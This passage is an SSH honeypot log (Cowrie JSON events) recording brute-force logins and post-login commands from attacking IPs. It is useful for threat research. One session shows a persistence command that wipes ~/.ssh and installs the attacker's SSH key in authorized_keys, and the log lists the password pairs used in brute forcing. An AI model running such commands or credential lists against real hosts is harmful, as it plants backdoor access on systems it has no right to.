{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T05:07:05.055218Z","src_ip":"212.227.235.229","session":"a6ff8c4cee82"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:05.185650Z","src_ip":"212.227.235.229","session":"435d4cf392d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54860,"dst_ip":"1.2.3.4","dst_port":22,"session":"51a7a61d2c5f","protocol":"ssh","message":"New connection: 212.227.235.229:54860 (1.2.3.4:22) [session: 51a7a61d2c5f]","sensor":"my-vps","timestamp":"2025-08-31T05:07:05.457130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:05.457806Z","src_ip":"212.227.235.229","session":"51a7a61d2c5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:05.730439Z","src_ip":"212.227.235.229","session":"51a7a61d2c5f"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:06.153229Z","src_ip":"212.227.235.229","session":"effe9717356b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:06.859748Z","src_ip":"212.227.235.229","session":"51a7a61d2c5f"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:07.134444Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:07.135452Z","src_ip":"212.227.235.229","session":"51a7a61d2c5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33878,"dst_ip":"1.2.3.4","dst_port":22,"session":"9223599d0b33","protocol":"ssh","message":"New connection: 212.227.235.229:33878 (1.2.3.4:22) [session: 9223599d0b33]","sensor":"my-vps","timestamp":"2025-08-31T05:07:11.994001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:11.995028Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.077515Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59586,"dst_ip":"1.2.3.4","dst_port":22,"session":"13e35d1ced93","protocol":"ssh","message":"New connection: 212.227.235.229:59586 (1.2.3.4:22) [session: 13e35d1ced93]","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.123321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.124250Z","src_ip":"212.227.235.229","session":"13e35d1ced93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.398447Z","src_ip":"212.227.235.229","session":"13e35d1ced93"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc12345.","message":"login attempt [root/Abc12345.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.448184Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:12.639573Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.640688Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.642430Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.727307Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.846884Z","src_ip":"212.227.235.229","session":"a6ff8c4cee82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:12.957528Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.957998Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.closed","duration":"38.3","message":"Connection lost after 38.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:12.960465Z","src_ip":"212.227.235.229","session":"effe9717356b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.042490Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.043504Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33884,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fba5657bb3a","protocol":"ssh","message":"New connection: 212.227.235.229:33884 (1.2.3.4:22) [session: 1fba5657bb3a]","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.143424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.144583Z","src_ip":"212.227.235.229","session":"1fba5657bb3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.235032Z","src_ip":"212.227.235.229","session":"1fba5657bb3a"}
{"eventid":"cowrie.login.failed","username":"sharp","password":"sharp","message":"login attempt [sharp/sharp] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.536479Z","src_ip":"212.227.235.229","session":"13e35d1ced93"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:13.639141Z","src_ip":"212.227.235.229","session":"1fba5657bb3a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:14.731403Z","src_ip":"212.227.235.229","session":"1fba5657bb3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38638,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1220b7745d7","protocol":"ssh","message":"New connection: 212.227.235.229:38638 (1.2.3.4:22) [session: c1220b7745d7]","sensor":"my-vps","timestamp":"2025-08-31T05:07:14.805721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:14.806953Z","src_ip":"212.227.235.229","session":"c1220b7745d7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:14.811785Z","src_ip":"212.227.235.229","session":"13e35d1ced93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:14.889765Z","src_ip":"212.227.235.229","session":"c1220b7745d7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:15.256938Z","src_ip":"212.227.235.229","session":"c1220b7745d7"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:15.340192Z","src_ip":"212.227.235.229","session":"9223599d0b33"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:15.341117Z","src_ip":"212.227.235.229","session":"c1220b7745d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38994,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b4d3b120259","protocol":"ssh","message":"New connection: 212.227.125.160:38994 (1.2.3.4:22) [session: 1b4d3b120259]","sensor":"my-vps","timestamp":"2025-08-31T05:07:15.344092Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48130,"dst_ip":"1.2.3.4","dst_port":22,"session":"90997495fe2b","protocol":"ssh","message":"New connection: 212.227.235.229:48130 (1.2.3.4:22) [session: 90997495fe2b]","sensor":"my-vps","timestamp":"2025-08-31T05:07:17.758656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:17.759789Z","src_ip":"212.227.235.229","session":"90997495fe2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:18.019253Z","src_ip":"212.227.235.229","session":"90997495fe2b"}
{"eventid":"cowrie.login.failed","username":"peter","password":"P@ssw0rd","message":"login attempt [peter/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:19.062479Z","src_ip":"212.227.235.229","session":"90997495fe2b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:20.116024Z","src_ip":"212.227.125.160","session":"1b4d3b120259"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:07:20.179119Z","src_ip":"212.227.125.160","session":"1b4d3b120259"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:20.333911Z","src_ip":"212.227.235.229","session":"90997495fe2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59936,"dst_ip":"1.2.3.4","dst_port":22,"session":"73537815174d","protocol":"ssh","message":"New connection: 212.227.235.229:59936 (1.2.3.4:22) [session: 73537815174d]","sensor":"my-vps","timestamp":"2025-08-31T05:07:37.382967Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48918,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb7db1fb603","protocol":"ssh","message":"New connection: 212.227.235.229:48918 (1.2.3.4:22) [session: 8eb7db1fb603]","sensor":"my-vps","timestamp":"2025-08-31T05:07:38.140565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:38.141248Z","src_ip":"212.227.235.229","session":"8eb7db1fb603"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:38.156155Z","src_ip":"212.227.235.229","session":"73537815174d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1